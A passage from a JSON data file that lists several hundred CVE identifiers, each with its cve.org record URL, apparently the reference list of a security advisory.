"url": "https://www.cve.org/CVERecord?id=CVE-2026-27571"
},
{
"name": "CVE-2025-39748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39748"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2026-27139",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27139"
},
{
"name": "CVE-2022-49127",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49127"
},
{
"name": "CVE-2026-24733",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24733"
},
{
"name": "CVE-2020-25741",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25741"
},
{
"name": "CVE-2022-50748",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50748"
},
{
"name": "CVE-2023-53767",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53767"
},
{
"name": "CVE-2025-21667",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21667"
},
{
"name": "CVE-2025-9230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"name": "CVE-2023-49083",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-49083"
},
{
"name": "CVE-2025-21696",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21696"
},
{
"name": "CVE-2025-68303",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68303"
},
{
"name": "CVE-2025-21955",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21955"
},
{
"name": "CVE-2025-39863",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39863"
},
{
"name": "CVE-2025-40259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40259"
},
{
"name": "CVE-2023-53180",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53180"
},
{
"name": "CVE-2026-28419",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28419"
},
{
"name": "CVE-2025-8677",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8677"
},
{
"name": "CVE-2025-38560",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38560"
},
{
"name": "CVE-2023-53385",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53385"
},
{
"name": "CVE-2026-23206",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23206"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2024-46678",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46678"
},
{
"name": "CVE-2024-58097",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58097"
},
{
"name": "CVE-2023-53620",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53620"
},
{
"name": "CVE-2022-50539",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50539"
},
{
"name": "CVE-2025-71068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71068"
},
{
"name": "CVE-2025-23130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23130"
},
{
"name": "CVE-2022-49496",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49496"
},
{
"name": "CVE-2025-38349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38349"
},
{
"name": "CVE-2024-56782",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56782"
},
{
"name": "CVE-2025-39957",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39957"
},
{
"name": "CVE-2025-1352",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1352"
},
{
"name": "CVE-2023-53540",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53540"
},
{
"name": "CVE-2022-49552",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49552"
},
{
"name": "CVE-2024-4741",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4741"
},
{
"name": "CVE-2023-53261",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53261"
},
{
"name": "CVE-2026-24049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24049"
},
{
"name": "CVE-2026-23033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23033"
},
{
"name": "CVE-2025-39726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39726"
},
{
"name": "CVE-2024-26759",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26759"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2025-39931",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39931"
},
{
"name": "CVE-2023-54187",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54187"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2026-23145",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23145"
},
{
"name": "CVE-2022-44032",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-44032"
},
{
"name": "CVE-2024-57895",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57895"
},
{
"name": "CVE-2023-53240",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53240"
},
{
"name": "CVE-2025-13735",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13735"
},
{
"name": "CVE-2023-53694",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53694"
},
{
"name": "CVE-2024-53195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53195"
},
{
"name": "CVE-2024-35794",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35794"
},
{
"name": "CVE-2023-52829",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52829"
},
{
"name": "CVE-2026-23003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23003"
},
{
"name": "CVE-2025-21891",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21891"
},
{
"name": "CVE-2025-38716",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38716"
},
{
"name": "CVE-2025-11187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11187"
},
{
"name": "CVE-2024-56660",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56660"
},
{
"name": "CVE-2026-23076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23076"
},
{
"name": "CVE-2023-54145",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54145"
},
{
"name": "CVE-2025-38033",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38033"
},
{
"name": "CVE-2024-41023",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41023"
},
{
"name": "CVE-2024-47704",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47704"
},
{
"name": "CVE-2025-21672",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21672"
},
{
"name": "CVE-2024-35801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35801"
},
{
"name": "CVE-2024-49978",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49978"
},
{
"name": "CVE-2024-36910",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36910"
},
{
"name": "CVE-2025-15079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15079"
},
{
"name": "CVE-2024-49870",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49870"
},
{
"name": "CVE-2025-36366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36366"
},
{
"name": "CVE-2024-42125",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42125"
},
{
"name": "CVE-2025-36123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36123"
},
{
"name": "CVE-2024-56737",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56737"
},
{
"name": "CVE-2025-68168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68168"
},
{
"name": "CVE-2025-21821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21821"
},
{
"name": "CVE-2025-68206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68206"
},
{
"name": "CVE-2020-11935",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11935"
},
{
"name": "CVE-2023-54247",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54247"
},
{
"name": "CVE-2025-68309",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68309"
},
{
"name": "CVE-2023-52905",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52905"
},
{
"name": "CVE-2024-57852",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57852"
},
{
"name": "CVE-2025-40003",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40003"
},
{
"name": "CVE-2025-22042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22042"
},
{
"name": "CVE-2025-71158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71158"
},
{
"name": "CVE-2022-49803",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49803"
},
{
"name": "CVE-2024-57898",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57898"
},
{
"name": "CVE-2020-35503",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35503"
},
{
"name": "CVE-2024-49923",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49923"
},
{
"name": "CVE-2024-56639",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56639"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2026-23171",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23171"
},
{
"name": "CVE-2024-3651",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3651"
},
{
"name": "CVE-2023-53002",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53002"
},
{
"name": "CVE-2021-0183",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0183"
},
{
"name": "CVE-2025-39884",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39884"
},
{
"name": "CVE-2025-39747",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39747"
},
{
"name": "CVE-2024-36914",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36914"
},
{
"name": "CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"name": "CVE-2024-35826",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35826"
},
{
"name": "CVE-2026-23112",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23112"
},
{
"name": "CVE-2022-49764",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49764"
},
{
"name": "CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"name": "CVE-2025-21651",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21651"
},
{
"name": "CVE-2025-38092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38092"
},
{
"name": "CVE-2025-22124",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22124"
},
{
"name": "CVE-2025-68313",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68313"
},
{
"name": "CVE-2024-58053",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58053"
},
{
"name": "CVE-2023-26553",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26553"
},
{
"name": "CVE-2025-60876",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-60876"
},
{
"name": "CVE-2025-37776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37776"
},
{
"name": "CVE-2021-23840",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23840"
},
{
"name": "CVE-2024-58077",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58077"
},
{
"name": "CVE-2024-6519",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6519"
},
{
"name": "CVE-2024-46729",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46729"
},
{
"name": "CVE-2023-53850",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53850"
},
{
"name": "CVE-2023-2975",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2975"
},
{
"name": "CVE-2022-50266",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50266"
},
{
"name": "CVE-2024-53178",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53178"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2026-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23084"
},
{
"name": "CVE-2023-53093",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53093"
},
{
"name": "CVE-2025-11065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11065"
},
{
"name": "CVE-2026-23190",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23190"
},
{
"name": "CVE-2025-40123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40123"
},
{
"name": "CVE-2026-22979",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22979"
},
{
"name": "CVE-2025-68301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68301"
},
{
"name": "CVE-2024-49991",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49991"
},
{
"name": "CVE-2022-50009",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50009"
},
{
"name": "CVE-2022-26047",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26047"
},
{
"name": "CVE-2024-53240",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53240"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2024-36949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36949"
},
{
"name": "CVE-2023-53816",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53816"
},
{
"name": "CVE-2025-37877",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37877"
},
{
"name": "CVE-2024-2193",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2193"
},
{
"name": "CVE-2025-4382",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4382"
},
{
"name": "CVE-2022-28693",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28693"
},
{
"name": "CVE-2025-71161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71161"
},
{
"name": "CVE-2025-39706",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39706"
},
{
"name": "CVE-2025-22038",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22038"
},
{
"name": "CVE-2025-68217",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68217"
},
{
"name": "CVE-2023-54242",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54242"
},
{
"name": "CVE-2025-68289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68289"
},
{
"name": "CVE-2025-40363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40363"
},
{
"name": "CVE-2024-41062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41062"
},
{
"name": "CVE-2025-40253",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40253"
},
{
"name": "CVE-2022-48816",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48816"
},
{
"name": "CVE-2026-27141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27141"
},
{
"name": "CVE-2025-37800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37800"
},
{
"name": "CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"name": "CVE-2022-50518",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50518"
},
{
"name": "CVE-2022-49829",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49829"
},
{
"name": "CVE-2025-64756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-64756"
},
{
"name": "CVE-2025-21967",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21967"
},
{
"name": "CVE-2016-2568",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-2568"
},
{
"name": "CVE-2020-13817",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13817"
},
{
"name": "CVE-2025-68245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68245"
},
{
"name": "CVE-2025-41254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41254"
},
{
"name": "CVE-2018-12929",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12929"
},
{
"name": "CVE-2024-26853",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26853"
},
{
"name": "CVE-2024-53147",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53147"
},
{
"name": "CVE-2025-39952",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39952"
},
{
"name": "CVE-2025-40317",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40317"
},
{
"name": "CVE-2024-45783",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45783"
},
{
"name": "CVE-2026-23110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23110"
},
{
"name": "CVE-2023-53410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53410"
},
{
"name": "CVE-2023-53254",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53254"
},
{
"name": "CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"name": "CVE-2023-47210",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47210"
},
{
"name": "CVE-2025-68809",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68809"
},
{
"name": "CVE-2025-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53864"
},
{
"name": "CVE-2024-36920",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36920"
},
{
"name": "CVE-2021-0165",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0165"
},
{
"name": "CVE-2025-0624",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0624"
},
{
"name": "CVE-2022-49177",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49177"
},
{
"name": "CVE-2025-38205",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38205"
},
{
"name": "CVE-2026-23100",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23100"
},
{
"name": "CVE-2025-59464",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59464"
},
{
"name": "CVE-2024-58241",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58241"
},
{
"name": "CVE-2025-21863",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21863"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2025-38166",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38166"
},
{
"name": "CVE-2022-49833",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49833"
},
{
"name": "CVE-2026-23060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23060"
},
{
"name": "CVE-2025-38321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38321"
},
{
"name": "CVE-2025-68282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68282"
},
{
"name": "CVE-2025-39705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39705"
},
{
"name": "CVE-2025-68817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68817"
},
{
"name": "CVE-2024-36021",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36021"
},
{
"name": "CVE-2025-38045",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38045"
},
{
"name": "CVE-2024-46726",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46726"
},
{
"name": "CVE-2025-40025",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40025"
},
{
"name": "CVE-2024-53079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53079"
},
{
"name": "CVE-2025-68787",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68787"
},
{
"name": "CVE-2025-1125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1125"
},
{
"name": "CVE-2023-53647",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53647"
},
{
"name": "CVE-2025-37954",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37954"
},
{
"name": "CVE-2025-23133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23133"
},
{
"name": "CVE-2025-0012",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0012"
},
{
"name": "CVE-2020-12313",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12313"
},
{
"name": "CVE-2025-71233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71233"
},
{
"name": "CVE-2025-68782",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68782"
},
{
"name": "CVE-2021-0166",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0166"
},
{
"name": "CVE-2025-21945",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21945"
},
{
"name": "CVE-2022-3872",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3872"
},
{
"name": "CVE-2025-39744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39744"
},
{
"name": "CVE-2025-71197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71197"
},
{
"name": "CVE-2025-68177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68177"
},
{
"name": "CVE-2025-68758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68758"
},
{
"name": "CVE-2024-49931",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49931"
},
{
"name": "CVE-2024-43866",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43866"
},
{
"name": "CVE-2024-37021",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37021"
},
{
"name": "CVE-2024-47728",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47728"
},
{
"name": "CVE-2025-27610",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27610"
},
{
"name": "CVE-2025-68191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68191"
},
{
"name": "CVE-2026-23031",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23031"
},
{
"name": "CVE-2024-46730",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46730"
},
{
"name": "CVE-2025-71113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71113"
},
{
"name": "CVE-2025-71127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71127"
},
{
"name": "CVE-2025-37786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37786"
},
{
"name": "CVE-2024-46728",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46728"
},
{
"name": "CVE-2023-53561",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53561"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2023-54172",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54172"
},
{
"name": "CVE-2026-23050",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23050"
},
{
"name": "CVE-2024-58100",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58100"
},
{
"name": "CVE-2020-0256",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-0256"
},
{
"name": "CVE-2025-21673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21673"
},
{
"name": "CVE-2024-26954",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26954"
},
{
"name": "CVE-2025-21634",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21634"
},
{
"name": "CVE-2024-57999",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57999"
},
{
"name": "CVE-2025-38047",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38047"
},
{
"name": "CVE-2024-47738",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47738"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2024-41013",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41013"
},
{
"name": "CVE-2023-54320",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54320"
},
{
"name": "CVE-2024-43911",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43911"
},
{
"name": "CVE-2025-30204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30204"
},
{
"name": "CVE-2025-37959",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37959"
},
{
"name": "CVE-2017-0537",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-0537"
},
{
"name": "CVE-2025-38191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38191"
},
{
"name": "CVE-2023-32681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32681"
},
{
"name": "CVE-2025-68219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68219"
},
{
"name": "CVE-2022-50232",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50232"
},
{
"name": "CVE-2025-38062",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38062"
},
{
"name": "CVE-2025-38531",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38531"
},
{
"name": "CVE-2023-26112",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26112"
},
{
"name": "CVE-2018-6952",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-6952"
},
{
"name": "CVE-2020-14304",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14304"
},
{
"name": "CVE-2024-46834",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46834"
},
{
"name": "CVE-2025-40288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40288"
},
{
"name": "CVE-2025-68239",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68239"
},
{
"name": "CVE-2025-40258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40258"
},
{
"name": "CVE-2025-21894",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21894"
},
{
"name": "CVE-2025-40281",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40281"
},
{
"name": "CVE-2025-68185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68185"
},
{
"name": "CVE-2025-40304",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40304"
},
{
"name": "CVE-2025-38503",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38503"
},
{
"name": "CVE-2025-40110",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40110"
},
{
"name": "CVE-2026-24001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24001"
},
{
"name": "CVE-2025-37807",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37807"
},
{
"name": "CVE-2025-38131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38131"
},
{
"name": "CVE-2022-50016",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50016"
},
{
"name": "CVE-2025-29481",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29481"
},
{
"name": "CVE-2024-53219",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53219"
},
{
"name": "CVE-2023-53009",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53009"
},
{
"name": "CVE-2025-40268",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40268"
},
{
"name": "CVE-2025-61661",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61661"
},
{
"name": "CVE-2026-23111",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23111"
},
{
"name": "CVE-2024-25740",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25740"
},
{
"name": "CVE-2024-50246",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50246"
},
{
"name": "CVE-2023-3446",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3446"
},
{
"name": "CVE-2025-14178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14178"
},
{
"name": "CVE-2024-57950",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57950"
},
{
"name": "CVE-2025-21759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21759"
},
{
"name": "CVE-2025-40325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40325"
},
{
"name": "CVE-2024-2511",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2511"
},
{
"name": "CVE-2024-42321",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42321"
},
{
"name": "CVE-2026-23113",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23113"
},
{
"name": "CVE-2021-0176",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0176"
},
{
"name": "CVE-2025-1151",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1151"
},
{
"name": "CVE-2022-48998",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48998"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2024-42273",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42273"
},
{
"name": "CVE-2025-68336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68336"
},
{
"name": "CVE-2023-53794",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53794"
},
{
"name": "CVE-2026-23157",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23157"
},
{
"name": "CVE-2025-40303",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40303"
},
{
"name": "CVE-2025-68178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68178"
},
{
"name": "CVE-2022-49974",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49974"
},
{
"name": "CVE-2025-40337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40337"
},
{
"name": "CVE-2019-20633",
